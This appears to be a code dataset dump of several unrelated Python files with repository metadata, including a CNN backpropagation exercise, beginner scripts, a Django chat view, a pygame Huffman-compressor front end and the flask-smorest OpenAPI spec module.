    dA_prev -- gradient of the cost with respect to the input of the conv layer (A_prev),
               numpy array of shape (m, n_H_prev, n_W_prev, n_C_prev)
    dW -- gradient of the cost with respect to the weights of the conv layer (W),
          numpy array of shape (f, f, n_C_prev, n_C)
    db -- gradient of the cost with respect to the biases of the conv layer (b),
          numpy array of shape (1, 1, 1, n_C)
    """
    # Retrieve information from "cache"
    (A_prev, W, b, hparameters) = cache
    # Retrieve dimensions from A_prev's shape
    (m, n_H_prev, n_W_prev, n_C_prev) = A_prev.shape
    # Retrieve dimensions from W's shape
    (f, f, n_C_prev, n_C) = W.shape
    # Retrieve information from "hparameters"
    stride = hparameters['stride']
    pad = hparameters['pad']
    # Retrieve dimensions from dZ's shape
    (m, n_H, n_W, n_C) = dZ.shape
    # Initialize dA_prev, dW, db with the correct shapes
    dA_prev = np.zeros(A_prev.shape)
    dW = np.zeros(W.shape)
    db = np.zeros((1, 1, 1, n_C))
    # Pad A_prev and dA_prev so window positions line up with the forward pass
    A_prev_pad = zero_pad(A_prev, pad)
    dA_prev_pad = zero_pad(dA_prev, pad)
    for i in range(m):              # loop over the training examples
        # select ith training example from A_prev_pad and dA_prev_pad
        a_prev_pad = A_prev_pad[i]
        da_prev_pad = dA_prev_pad[i]
        for h in range(n_H):        # loop over vertical axis of the output volume
            for w in range(n_W):    # loop over horizontal axis of the output volume
                for c in range(n_C):    # loop over the channels of the output volume
                    # Find the corners of the current "slice"
                    vert_start = h * stride
                    vert_end = vert_start + f
                    horiz_start = w * stride
                    horiz_end = horiz_start + f
                    # Use the corners to define the slice from a_prev_pad
                    a_slice = a_prev_pad[vert_start:vert_end, horiz_start:horiz_end, :]
                    # Update gradients for the window and the filter's parameters
                    # using formulas 1, 2 and 3 given above
                    da_prev_pad[vert_start:vert_end, horiz_start:horiz_end, :] += W[:, :, :, c] * dZ[i, h, w, c]
                    dW[:, :, :, c] += a_slice * dZ[i, h, w, c]
                    db[:, :, :, c] += dZ[i, h, w, c]
        # Set the ith training example's dA_prev to the unpadded da_prev_pad.
        # Bug fix: da_prev_pad[pad:-pad, pad:-pad, :] is an EMPTY slice when
        # pad == 0, which would silently leave dA_prev all zeros. Only strip
        # the padding when there actually is some.
        if pad > 0:
            dA_prev[i, :, :, :] = da_prev_pad[pad:-pad, pad:-pad, :]
        else:
            dA_prev[i, :, :, :] = da_prev_pad
    # Making sure your output shape is correct
    assert(dA_prev.shape == (m, n_H_prev, n_W_prev, n_C_prev))
    return dA_prev, dW, db
# In[38]:
# Sanity-check conv_backward; printed means must match the expected-output table below.
np.random.seed(1)
# Z and cache_conv were produced by the conv_forward call earlier in this file.
dA, dW, db = conv_backward(Z, cache_conv)
print("dA_mean =", np.mean(dA))
print("dW_mean =", np.mean(dW))
print("db_mean =", np.mean(db))
# ** Expected Output: **
# <table>
# <tr>
# <td>
# **dA_mean**
# </td>
# <td>
# 1.45243777754
# </td>
# </tr>
# <tr>
# <td>
# **dW_mean**
# </td>
# <td>
# 1.72699145831
# </td>
# </tr>
# <tr>
# <td>
# **db_mean**
# </td>
# <td>
# 7.83923256462
# </td>
# </tr>
#
# </table>
#
# ## 5.2 Pooling layer - backward pass
#
# Next, let's implement the backward pass for the pooling layer, starting with the MAX-POOL layer. Even though a pooling layer has no parameters for backprop to update, you still need to backpropagate the gradient through the pooling layer in order to compute gradients for layers that came before the pooling layer.
#
# ### 5.2.1 Max pooling - backward pass
#
# Before jumping into the backpropagation of the pooling layer, you are going to build a helper function called `create_mask_from_window()` which does the following:
#
# $$ X = \begin{bmatrix}
# 1 && 3 \\
# 4 && 2
# \end{bmatrix} \quad \rightarrow \quad M =\begin{bmatrix}
# 0 && 0 \\
# 1 && 0
# \end{bmatrix}\tag{4}$$
#
# As you can see, this function creates a "mask" matrix which keeps track of where the maximum of the matrix is. True (1) indicates the position of the maximum in X, the other entries are False (0). You'll see later that the backward pass for average pooling will be similar to this but using a different mask.
#
# **Exercise**: Implement `create_mask_from_window()`. This function will be helpful for pooling backward.
# Hints:
# - [np.max()]() may be helpful. It computes the maximum of an array.
# - If you have a matrix X and a scalar x: `A = (X == x)` will return a matrix A of the same size as X such that:
# ```
# A[i,j] = True if X[i,j] = x
# A[i,j] = False if X[i,j] != x
# ```
# - Here, you don't need to consider cases where there are several maxima in a matrix.
# In[39]:
def create_mask_from_window(x):
    """
    Creates a mask from an input matrix x, to identify the max entry of x.

    Arguments:
    x -- Array of shape (f, f)

    Returns:
    mask -- Boolean array of the same shape as x, True at the position(s)
            holding the maximum entry of x, False everywhere else.
    """
    # Compare every entry against the window maximum; the elementwise
    # comparison broadcasts the scalar and yields the boolean mask directly.
    largest = np.max(x)
    mask = x == largest
    return mask
# In[40]:
# Demo: build a mask for a random 2x3 window; output must match the table below.
np.random.seed(1)
x = np.random.randn(2,3)
mask = create_mask_from_window(x)
print('x = ', x)
print("mask = ", mask)
# **Expected Output:**
#
# <table>
# <tr>
# <td>
#
# **x =**
# </td>
#
# <td>
#
# [[ 1.62434536 -0.61175641 -0.52817175] <br>
# [-1.07296862 0.86540763 -2.3015387 ]]
#
# </td>
# </tr>
#
# <tr>
# <td>
# **mask =**
# </td>
# <td>
# [[ True False False] <br>
# [False False False]]
# </td>
# </tr>
#
#
# </table>
# Why do we keep track of the position of the max? It's because this is the input value that ultimately influenced the output, and therefore the cost. Backprop is computing gradients with respect to the cost, so anything that influences the ultimate cost should have a non-zero gradient. So, backprop will "propagate" the gradient back to this particular input value that had influenced the cost.
# ### 5.2.2 - Average pooling - backward pass
#
# In max pooling, for each input window, all the "influence" on the output came from a single input value--the max. In average pooling, every element of the input window has equal influence on the output. So to implement backprop, you will now implement a helper function that reflects this.
#
# For example if we did average pooling in the forward pass using a 2x2 filter, then the mask you'll use for the backward pass will look like:
# $$ dZ = 1 \quad \rightarrow \quad dZ =\begin{bmatrix}
# 1/4 && 1/4 \\
# 1/4 && 1/4
# \end{bmatrix}\tag{5}$$
#
# This implies that each position in the $dZ$ matrix contributes equally to output because in the forward pass, we took an average.
#
# **Exercise**: Implement the function below to equally distribute a value dz through a matrix of dimension shape. [Hint](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.ones.html)
# In[41]:
def distribute_value(dz, shape):
    """
    Distributes the input value equally over a matrix of dimension shape.

    Arguments:
    dz -- input scalar
    shape -- the shape (n_H, n_W) of the output matrix for which we want to
             distribute the value of dz

    Returns:
    a -- Array of size (n_H, n_W) in which the value of dz is distributed
    """
    # Retrieve dimensions from shape
    (n_H, n_W) = shape
    # Compute the value to distribute on the matrix.
    # Bug fix: the denominator is the number of window entries n_H * n_W,
    # not np.sum(shape) = n_H + n_W. The two only coincide for 2x2 windows,
    # which is why the demo below happened to look correct.
    average = dz / (n_H * n_W)
    # Create a matrix where every entry is the "average" value
    a = np.ones(shape) * average
    return a
# In[42]:
# Demo: spread the scalar 2 over a 2x2 window; expected result is all 0.5.
a = distribute_value(2, (2,2))
print('distributed value =', a)
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# distributed_value =
# </td>
# <td>
# [[ 0.5 0.5]
# <br\>
# [ 0.5 0.5]]
# </td>
# </tr>
# </table>
# ### 5.2.3 Putting it together: Pooling backward
#
# You now have everything you need to compute backward propagation on a pooling layer.
#
# **Exercise**: Implement the `pool_backward` function in both modes (`"max"` and `"average"`). You will once again use 4 for-loops (iterating over training examples, height, width, and channels). You should use an `if/elif` statement to see if the mode is equal to `'max'` or `'average'`. If it is equal to 'average' you should use the `distribute_value()` function you implemented above to create a matrix of the same shape as `a_slice`. Otherwise, the mode is equal to '`max`', and you will create a mask with `create_mask_from_window()` and multiply it by the corresponding value of dZ.
# In[43]:
def pool_backward(dA, cache, mode = "max"):
    """
    Implements the backward pass of the pooling layer.

    Arguments:
    dA -- gradient of cost with respect to the output of the pooling layer, same shape as A
    cache -- cache output from the forward pass of the pooling layer, contains the layer's input and hparameters
    mode -- the pooling mode you would like to use, defined as a string ("max" or "average")

    Returns:
    dA_prev -- gradient of cost with respect to the input of the pooling layer, same shape as A_prev

    Raises:
    ValueError -- if mode is neither "max" nor "average"
    """
    # Retrieve information from cache
    (A_prev, hparameters) = cache
    # Retrieve hyperparameters from "hparameters"
    stride = hparameters['stride']
    f = hparameters['f']
    # Retrieve dimensions from A_prev's shape and dA's shape
    m, n_H_prev, n_W_prev, n_C_prev = A_prev.shape
    m, n_H, n_W, n_C = dA.shape
    # Initialize dA_prev with zeros
    dA_prev = np.zeros(A_prev.shape)
    for i in range(m):              # loop over the training examples
        # select training example from A_prev
        a_prev = A_prev[i]
        for h in range(n_H):        # loop on the vertical axis
            for w in range(n_W):    # loop on the horizontal axis
                for c in range(n_C):    # loop over the channels (depth)
                    # Find the corners of the current "slice".
                    # Bug fix: the forward pass moves the window by `stride`,
                    # so the corners must be scaled by it. The original
                    # (vert_start = h) only worked because the demo uses
                    # stride == 1.
                    vert_start = h * stride
                    vert_end = vert_start + f
                    horiz_start = w * stride
                    horiz_end = horiz_start + f
                    # Compute the backward propagation in both modes.
                    if mode == "max":
                        # Only the max entry of the window influenced the
                        # output, so route the gradient back to it alone.
                        a_prev_slice = a_prev[vert_start:vert_end, horiz_start:horiz_end, c]
                        mask = create_mask_from_window(a_prev_slice)
                        dA_prev[i, vert_start:vert_end, horiz_start:horiz_end, c] += np.multiply(mask, dA[i, h, w, c])
                    elif mode == "average":
                        # Every entry of the window contributed equally, so
                        # spread the gradient uniformly over the f x f window.
                        da = dA[i, h, w, c]
                        shape = (f, f)
                        dA_prev[i, vert_start:vert_end, horiz_start:horiz_end, c] += distribute_value(da, shape)
                    else:
                        # Fail loudly instead of silently returning zeros.
                        raise ValueError("mode must be 'max' or 'average', got: " + str(mode))
    # Making sure your output shape is correct
    assert(dA_prev.shape == A_prev.shape)
    return dA_prev
# In[44]:
# Sanity-check pool_backward in both modes; output must match the tables below.
np.random.seed(1)
A_prev = np.random.randn(5, 5, 3, 2)
# Forward pass with a 2x2 window and stride 1 (pool_forward defined earlier).
hparameters = {"stride" : 1, "f": 2}
A, cache = pool_forward(A_prev, hparameters)
# Upstream gradient with the same shape as the pooling output A.
dA = np.random.randn(5, 4, 2, 2)
dA_prev = pool_backward(dA, cache, mode = "max")
print("mode = max")
print('mean of dA = ', np.mean(dA))
print('dA_prev[1,1] = ', dA_prev[1,1])
print()
dA_prev = pool_backward(dA, cache, mode = "average")
print("mode = average")
print('mean of dA = ', np.mean(dA))
print('dA_prev[1,1] = ', dA_prev[1,1])
# **Expected Output**:
#
# mode = max:
# <table>
# <tr>
# <td>
#
# **mean of dA =**
# </td>
#
# <td>
#
# 0.145713902729
#
# </td>
# </tr>
#
# <tr>
# <td>
# **dA_prev[1,1] =**
# </td>
# <td>
# [[ 0. 0. ] <br>
# [ 5.05844394 -1.68282702] <br>
# [ 0. 0. ]]
# </td>
# </tr>
# </table>
#
# mode = average
# <table>
# <tr>
# <td>
#
# **mean of dA =**
# </td>
#
# <td>
#
# 0.145713902729
#
# </td>
# </tr>
#
# <tr>
# <td>
# **dA_prev[1,1] =**
# </td>
# <td>
# [[ 0.08485462 0.2787552 ] <br>
# [ 1.26461098 -0.25749373] <br>
# [ 1.17975636 -0.53624893]]
# </td>
# </tr>
# </table>
# ### Congratulations !
#
# Congratulation on completing this assignment. You now understand how convolutional neural networks work. You have implemented all the building blocks of a neural network. In the next assignment you will implement a ConvNet using TensorFlow.
| [
"noreply@github.com"
] | noreply@github.com |
6dbd0089562c4fe55ce0b2f50c7e256a49998243 | 8cb3e0565f9711e622d206d10c95b9e81b87375a | /scripts/states/state45Right.py | e283444bc80196511363052b6e02795e1e059049 | [] | no_license | Brent-Kuhn/Dat_Whip | f03819a48ddf94681fd9071ff736f50b7b5f75a3 | 4dc80a03bf392e72af2f316c052d60c222dafbf0 | refs/heads/master | 2021-09-25T02:19:52.745487 | 2018-10-17T01:45:55 | 2018-10-17T01:45:55 | 121,988,346 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | #!/usr/bin/python
from states.state45 import State45
class State45Right(State45):
def error(self, lidar, zed, imu):
return -1 # Turn right, indiscriminately
# TODO don't hit the cone if possible
def nextState(self, lidar, zed, imu):
return 'StateCircleLeft'
| [
"car@car.car"
] | car@car.car |
1529d544e0bb3a4bd339573ef601dd8e4b554446 | 301c7ca9863a1fa8379a335fd6bf57cd074522d1 | /海贼/python/模块/1.py | b7b5c572c37d867997925491c4a5e0074c829360 | [] | no_license | qingdaopijiudiaoge/haizei | f8bbac869ff0f76076b8f167e562a2512db47f29 | 26d43ca910272aa3868d408e661376166dea8da4 | refs/heads/master | 2023-01-31T14:48:39.693647 | 2020-12-17T12:15:55 | 2020-12-17T12:15:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | #!/usr/bin/env python
# coding=utf-8
# os 模块
import os
#打开文件
path = '/home/yuzhendi/海贼/python'
dirs = os.listdir(path)
for file in dirs:
print(file)
#创建多级目录
path = './test/a'
os.makedirs(path)
#判断路径是否存在
| [
"1316215578@qq.com"
] | 1316215578@qq.com |
1a6f4d5281aa3da6826118ec92cb6ca72bf2022f | 71be8a99bd3d8b26204e5552b70078dfdb20d27b | /03.py | 929d0e6ff0c787f9eee20e1ab5b95aaeed014968 | [] | no_license | shady2022/tamrin_python1 | 5123a05eaf49a0b93b34bee004e01cce751d2c7c | f6e801722f9753325f09275f82850fde8fda2f04 | refs/heads/main | 2023-07-05T22:31:20.733332 | 2021-07-29T18:46:24 | 2021-07-29T18:46:24 | 390,820,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | import math
name = input()
family = input()
a = float(input("please enter the number of first exam:"))
b = float(input("please enter the number of second exam:"))
c = float(input("please enter the number of third exam:"))
avarage = (a+b+c)/3
if avarage >= 17:
print("GREAT!!!")
if avarage >= 12 and avarage <17:
print("NORMAL")
if avarage < 12:
print("FAIL") | [
"noreply@github.com"
] | noreply@github.com |
e3d149b7b7cf48fd12d2013aefb000ecade6610f | 5d32d0e65aa3bfa677fd1b8c92569e07e9b82af1 | /Section 5 - Programming Logic/Guess game v3 - multiple if.py | 1136fb613ad7c5b24b6249a57be9343f93a90ebf | [
"CC0-1.0"
] | permissive | pdst-lccs/lccs-python | b74ef2a02ac8ad2637f713fff5559f4e56c9827d | 95cb7ece05716521e9951d7a40de8fb20a88021f | refs/heads/master | 2023-05-28T00:46:57.313972 | 2023-05-22T10:16:43 | 2023-05-22T10:16:43 | 240,501,524 | 21 | 18 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | # Event: LCCS Python Fundamental Skills Workshop
# Date: May 2018
# Author: Joe English, PDST
# eMail: computerscience@pdst.ie
# Name: Guessing Game v3
# Purpose: A program to demonstrate the multiple if statement
import random
number = random.randint(1, 10)
# The next line can be commented out later ...
print(number) # have a sneak peek at the number to guess!
guess = int(input("Enter a number between 1 and 10: "))
# Evaluate the condition
if guess == number:
print("Correct")
print("Well done!")
elif guess < number:
print("Hard luck!")
print("Too low")
else:
print("Hard luck!")
print("Too high")
print("Goodbye")
| [
"noreply@github.com"
] | noreply@github.com |
c651cd4ab09477167951d857f41bf5dd83a8c76c | 1f03e91bb1f743ac39e973e36935778c21ccaea4 | /meetingapp/chatengine/views.py | 916c6e05c79da1c445a00cbe256e11487d703164 | [] | no_license | Golub-Sergey/django-meeting-site | 0747de0fd9669be21c2d6b86b4dd518a9f44bb5c | dd174fe794390936e6ab834d1cf3b08a0292dea6 | refs/heads/master | 2020-05-03T10:13:18.520731 | 2019-03-30T15:18:14 | 2019-03-30T15:18:14 | 178,574,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 882 | py | from django.shortcuts import render
import json
from django.utils.safestring import mark_safe
from django.views.generic import TemplateView
from meetingsite.models import CustomUser
from .models import Group
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
@method_decorator(login_required, 'dispatch')
class RoomView(TemplateView):
template_name = 'chatengine/room.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
receiver = kwargs['room_name']
query_receiver = CustomUser.objects.get(username=receiver)
group_messages = Group.objects.filter(group_name__icontains=receiver)
context = {
'receiver': query_receiver,
'group_messages': group_messages
}
return context
| [
"1.golub.sergey.1@gmail.com"
] | 1.golub.sergey.1@gmail.com |
4d5dc1e342aed21f55fcc37ab7d21a41f9ae9112 | 01f065407c770c380ff4fcc7f76dc8c2316aea49 | /压缩软件前端.py | 5d5b01c0c3388b7b574923c132b9ae4843dff587 | [] | no_license | JiaminL/Huffman | 07f3dc03c29ac5f4a865a48050fc21130ac03beb | ae8886574c7afecfeb41804ca46060eadac12eb6 | refs/heads/master | 2020-04-09T08:55:28.710122 | 2018-12-03T15:30:30 | 2018-12-03T15:30:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,415 | py | import os,pygame,sys
import subprocess as sp
from pygame.locals import*
# R G B
WHITE = (255,255,255)
BLUE = ( 0, 0,255)
YELLOW = (255,255, 0)
BLACK = ( 0, 0, 0)
GARY = (235,235,235)
FPS=30
WINDOWWIDTH=1200
WINDOWHEIGHT=700
PARTWIDTH=WINDOWWIDTH/3
TEXTSIZE1=50
TEXTSIZE2=25
TEXTSIZE3=35
GAPSIZE=5
BUTTOMWIDTH=100
BUTTOMHEIGHT=40
TEXTBEGIN=GAPSIZE*3+TEXTSIZE1
ORIFOLDER="huffman实验测试集"
ZIPFOLDER="huffman实验压缩文件"
UNZIPFOLDER="huffman实验解压文件"
PARTNAME=("原文件","压缩文件","解压文件")
EXENAME=("./压缩后端","./解压后端")
def sedInform(exeName,oriFile,midFile,huffFile):
p = sp.Popen(exeName, stdin=sp.PIPE, stdout=sp.PIPE)
while True:
try:
data = "{}\n{}\n{}\n".format(oriFile, midFile, huffFile).encode("ascii")
p.stdin.write(data)
p.stdin.flush()
except:
print("there is some errors when send the name of files to c programe")
def getFileName():
F=[]
for fileDir in (ORIFOLDER,ZIPFOLDER,UNZIPFOLDER):
for root,dirs,files in os.walk(fileDir):
dele=[]
if fileDir==ZIPFOLDER:
for path in files:
if os.path.splitext(path)[1]!=".huff":
dele.append(path)
elif fileDir==ORIFOLDER:
for path in files:
if os.path.splitext(path)[1]==".mid":
dele.append(path)
for path in dele:
files.remove(path)
F.append(files)
return F
def newFolder():
path=os.path.abspath("")
for folerName in (ORIFOLDER,ZIPFOLDER,UNZIPFOLDER):
try:
os.path.join(path,folerName)
os.mkdir(path+"\\"+folerName)
except:
continue
def drawText(Text,size,left,top,textcolor,boxcolor):
fontObj=pygame.font.Font('simkai.ttf',size)
textSurfaceObj=fontObj.render(Text,True,textcolor,boxcolor)
textRectObj=textSurfaceObj.get_rect()
textRectObj.topleft=(left,top)
DISPLAYSURF.blit(textSurfaceObj,textRectObj)
def drawWindow(files):
DISPLAYSURF.fill(WHITE)
for i in range(3):
x=i*PARTWIDTH
pygame.draw.line(DISPLAYSURF,BLUE,(x,0),(x,WINDOWHEIGHT),2)
x+=GAPSIZE
drawText(PARTNAME[i],TEXTSIZE1,x,GAPSIZE,BLACK,WHITE)
y=TEXTBEGIN
for fileName in files[i]:
drawText(fileName,TEXTSIZE2,x,y,BLACK,WHITE)
y+=TEXTSIZE2+GAPSIZE
def getBoxAtPixel(mousex,mousey):
boxx=int(mousex/PARTWIDTH)
boxy=int((mousey-TEXTBEGIN)/(TEXTSIZE2+GAPSIZE))
return (boxx,boxy)
def getChoice():
mousex=0
mousey=0
while True:
files=getFileName()
oriFile,zipFile,unzipFile=files
fileLength=(len(oriFile),len(zipFile),len(unzipFile))
mouseClicked=False
drawWindow(files)
for event in pygame.event.get():
if event.type==QUIT or (event.type==KEYUP and event.key==K_ESCAPE):
pygame.quit()
sys.exit()
elif event.type==MOUSEMOTION:
mousex,mousey=event.pos
elif event.type==MOUSEBUTTONUP:
mousex,mousey=event.pos
mouseClicked=True
myChoice=getBoxAtPixel(mousex,mousey)
if myChoice[0]<2 and myChoice[1]>=0 and myChoice[1]<fileLength[myChoice[0]]:
if myChoice[0]:text="解压"
else:text="压缩"
left,top=(myChoice[0]*PARTWIDTH,TEXTBEGIN+(TEXTSIZE2+GAPSIZE)*myChoice[1])
pygame.draw.rect(DISPLAYSURF,YELLOW,(left,top-GAPSIZE/2,PARTWIDTH,TEXTSIZE2+GAPSIZE),4)
drawText(text,TEXTSIZE2,(myChoice[0]+1)*PARTWIDTH-2*TEXTSIZE2,top,YELLOW,WHITE)
if mouseClicked:
return myChoice
pygame.display.update()
def run(path1,choise):
files=getFileName()
if choise[0]==0:
text="压缩“"+files[choise[0]][choise[1]]+"”中……请耐心等待"
oriname=path1+"\\"+ORIFOLDER+"\\"+files[choise[0]][choise[1]]
huffname=path1+"\\"+ZIPFOLDER+"\\"+files[choise[0]][choise[1]]+".huff"
else:
path=files[choise[0]][choise[1]]
text="解压“"+path+"”中……请耐心等待"
oriname=path1+"\\"+UNZIPFOLDER+"\\new"+os.path.splitext(path)[0]
huffname=path1+"\\"+ZIPFOLDER+"\\"+files[choise[0]][choise[1]]
try:
p = sp.Popen(EXENAME[choise[0]], stdin=sp.PIPE, stdout=sp.PIPE)
data = "{}\n{}\n".format(oriname, huffname).encode("gbk")
drawText(text,TEXTSIZE3,GAPSIZE,WINDOWHEIGHT-TEXTSIZE3-GAPSIZE,BLACK,GARY)
pygame.display.update()
p.stdin.write(data)
p.stdin.flush()
s=p.stdout.readline()
except:
print("error run")
print( "{}\n{}\n".format(oriname, huffname))
def main():
global DISPLAYSURF
path=os.path.abspath("")
newFolder()
pygame.init()
DISPLAYSURF=pygame.display.set_mode((WINDOWWIDTH,WINDOWHEIGHT))
pygame.display.set_caption('压缩软件')
while True:
files=getFileName()
drawWindow(files)
for event in pygame.event.get():
if event.type==QUIT:
pygame.quit()
sys.exit()
choise=getChoice()
run(path,choise)
pygame.display.update()
if __name__=='__main__':
main()
| [
"43880486+TheaLu@users.noreply.github.com"
] | 43880486+TheaLu@users.noreply.github.com |
f71ec4146bf3702e19f5c68b3fd31bc7127c802f | ebfcae1c5ba2997b2ac4471d5bedc3f5daffcb31 | /flask-smorest-master/flask_smorest/spec/__init__.py | f64833894a322e17deab1be0723b1895c67e7fb5 | [
"MIT"
] | permissive | babiato/flaskapp1 | 84de2d0b26a54f5820d3bbe97926782ad41e005c | 530beb9e3b8516e0e93960b99521c23a523ef546 | refs/heads/master | 2023-02-26T16:36:49.760632 | 2021-02-04T09:08:40 | 2021-02-04T09:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,624 | py | """API specification using OpenAPI"""
import json
import http
import flask
from flask import current_app
import click
import apispec
from apispec.ext.marshmallow import MarshmallowPlugin
from flask_smorest.exceptions import MissingAPIParameterError
from flask_smorest.utils import prepare_response
from .plugins import FlaskPlugin
from .field_converters import uploadfield2properties
def _add_leading_slash(string):
"""Add leading slash to a string if there is None"""
return string if string.startswith('/') else '/' + string
DEFAULT_REQUEST_BODY_CONTENT_TYPE = 'application/json'
DEFAULT_RESPONSE_CONTENT_TYPE = 'application/json'
class DocBlueprintMixin:
"""Extend Api to serve the spec in a dedicated blueprint."""
def _register_doc_blueprint(self):
"""Register a blueprint in the application to expose the spec
Doc Blueprint contains routes to
- json spec file
- spec UI (ReDoc, Swagger UI).
"""
api_url = self._app.config.get('OPENAPI_URL_PREFIX', None)
if api_url is not None:
blueprint = flask.Blueprint(
'api-docs',
__name__,
url_prefix=_add_leading_slash(api_url),
template_folder='./templates',
)
# Serve json spec at 'url_prefix/openapi.json' by default
json_path = self._app.config.get(
'OPENAPI_JSON_PATH', 'openapi.json')
blueprint.add_url_rule(
_add_leading_slash(json_path),
endpoint='openapi_json',
view_func=self._openapi_json)
self._register_redoc_rule(blueprint)
self._register_swagger_ui_rule(blueprint)
self._app.register_blueprint(blueprint)
def _register_redoc_rule(self, blueprint):
"""Register ReDoc rule
The ReDoc script URL should be specified as OPENAPI_REDOC_URL.
"""
redoc_path = self._app.config.get('OPENAPI_REDOC_PATH')
if redoc_path is not None:
redoc_url = self._app.config.get('OPENAPI_REDOC_URL')
if redoc_url is not None:
self._redoc_url = redoc_url
blueprint.add_url_rule(
_add_leading_slash(redoc_path),
endpoint='openapi_redoc',
view_func=self._openapi_redoc)
def _register_swagger_ui_rule(self, blueprint):
"""Register Swagger UI rule
The Swagger UI scripts base URL should be specified as
OPENAPI_SWAGGER_UI_URL.
"""
swagger_ui_path = self._app.config.get('OPENAPI_SWAGGER_UI_PATH')
if swagger_ui_path is not None:
swagger_ui_url = self._app.config.get('OPENAPI_SWAGGER_UI_URL')
if swagger_ui_url is not None:
self._swagger_ui_url = swagger_ui_url
blueprint.add_url_rule(
_add_leading_slash(swagger_ui_path),
endpoint='openapi_swagger_ui',
view_func=self._openapi_swagger_ui)
def _openapi_json(self):
"""Serve JSON spec file"""
# We don't use Flask.jsonify here as it would sort the keys
# alphabetically while we want to preserve the order.
return current_app.response_class(
json.dumps(self.spec.to_dict(), indent=2),
mimetype='application/json')
def _openapi_redoc(self):
"""Expose OpenAPI spec with ReDoc"""
return flask.render_template(
'redoc.html', title=self.spec.title, redoc_url=self._redoc_url)
def _openapi_swagger_ui(self):
"""Expose OpenAPI spec with Swagger UI"""
return flask.render_template(
'swagger_ui.html',
title=self.spec.title,
swagger_ui_url=self._swagger_ui_url,
swagger_ui_config=self._app.config.get(
'OPENAPI_SWAGGER_UI_CONFIG', {})
)
class APISpecMixin(DocBlueprintMixin):
"""Add APISpec related features to Api class"""
def _init_spec(
self, *,
flask_plugin=None, marshmallow_plugin=None, extra_plugins=None,
title=None, version=None, openapi_version=None,
**options
):
# Plugins
self.flask_plugin = flask_plugin or FlaskPlugin()
self.ma_plugin = marshmallow_plugin or MarshmallowPlugin()
plugins = [self.flask_plugin, self.ma_plugin]
plugins.extend(extra_plugins or ())
# APISpec options
title = self._app.config.get('API_TITLE', title)
if title is None:
raise MissingAPIParameterError(
'API title must be specified either as "API_TITLE" '
'app parameter or as "title" spec kwarg.'
)
version = self._app.config.get('API_VERSION', version)
if version is None:
raise MissingAPIParameterError(
'API version must be specified either as "API_VERSION" '
'app parameter or as "version" spec kwarg.'
)
openapi_version = self._app.config.get(
'OPENAPI_VERSION', openapi_version)
if openapi_version is None:
raise MissingAPIParameterError(
'OpenAPI version must be specified either as "OPENAPI_VERSION '
'app parameter or as "openapi_version" spec kwarg.'
)
openapi_major_version = int(openapi_version.split('.')[0])
if openapi_major_version < 3:
base_path = self._app.config.get('APPLICATION_ROOT')
options.setdefault('basePath', base_path)
options.setdefault(
'produces', [DEFAULT_RESPONSE_CONTENT_TYPE, ])
options.setdefault(
'consumes', [DEFAULT_REQUEST_BODY_CONTENT_TYPE, ])
options.update(self._app.config.get('API_SPEC_OPTIONS', {}))
# Instantiate spec
self.spec = apispec.APISpec(
title, version, openapi_version, plugins, **options,
)
# Register custom fields in spec
for args in self._fields:
self._register_field(*args)
# Register custom converters in spec
for args in self._converters:
self._register_converter(*args)
# Register Upload field properties function
self.ma_plugin.converter.add_attribute_function(uploadfield2properties)
# Register OpenAPI command group
self._app.cli.add_command(openapi_cli)
def register_converter(self, converter, func):
"""Register custom path parameter converter
:param BaseConverter converter: Converter
Subclass of werkzeug's BaseConverter
:param callable func: Function returning a parameter schema from
a converter intance
Example: ::
# Register MongoDB's ObjectId converter in Flask application
app.url_map.converters['objectid'] = ObjectIdConverter
# Define custom converter to schema function
def objectidconverter2paramschema(converter):
return {'type': 'string', 'format': 'ObjectID'}
# Register converter in Api
api.register_converter(
ObjectIdConverter,
objectidconverter2paramschema
)
@blp.route('/pets/{objectid:pet_id}')
...
api.register_blueprint(blp)
Once the converter is registered, all paths using it will have
corresponding path parameter documented with the right schema.
Should be called before registering paths with
:meth:`Blueprint.route <Blueprint.route>`.
"""
self._converters.append((converter, func))
# Register converter in spec if app is already initialized
if self.spec is not None:
self._register_converter(converter, func)
def _register_converter(self, converter, func):
self.flask_plugin.register_converter(converter, func)
def register_field(self, field, *args):
"""Register custom Marshmallow field
Registering the Field class allows the Schema parser to set the proper
type and format when documenting parameters from Schema fields.
:param Field field: Marshmallow Field class
``*args`` can be:
- a pair of the form ``(type, format)`` to map to
- a core marshmallow field type (then that type's mapping is used)
Examples: ::
# Map to ('string', 'ObjectId') passing type and format
api.register_field(ObjectId, 'string', 'ObjectId')
# Map to ('string', ) passing type
api.register_field(CustomString, 'string', None)
# Map to ('string, 'date-time') passing a marshmallow Field
api.register_field(CustomDateTime, ma.fields.DateTime)
Should be called before registering schemas with
:meth:`schema <Api.schema>`.
"""
self._fields.append((field, *args))
# Register field in spec if app is already initialized
if self.spec is not None:
self._register_field(field, *args)
def _register_field(self, field, *args):
self.ma_plugin.map_to_openapi_type(*args)(field)
def _register_responses(self):
"""Register default responses for all status codes"""
# Register a response for each status code
for status in http.HTTPStatus:
response = {
'description': status.phrase,
'schema': self.ERROR_SCHEMA,
}
prepare_response(
response, self.spec, DEFAULT_RESPONSE_CONTENT_TYPE)
self.spec.components.response(status.name, response)
# Also register a default error response
response = {
'description': 'Default error response',
'schema': self.ERROR_SCHEMA,
}
prepare_response(response, self.spec, DEFAULT_RESPONSE_CONTENT_TYPE)
self.spec.components.response('DEFAULT_ERROR', response)
openapi_cli = flask.cli.AppGroup('openapi', help='OpenAPI commands.')
@openapi_cli.command('print')
def print_openapi_doc():
"""Print OpenAPI document."""
api = current_app.extensions['flask-smorest']['ext_obj']
print(json.dumps(api.spec.to_dict(), indent=2))
@openapi_cli.command('write')
@click.argument('output_file', type=click.File(mode='w'))
def write_openapi_doc(output_file):
"""Write OpenAPI document to a file."""
api = current_app.extensions['flask-smorest']['ext_obj']
output_file.write(json.dumps(api.spec.to_dict(), indent=2))
| [
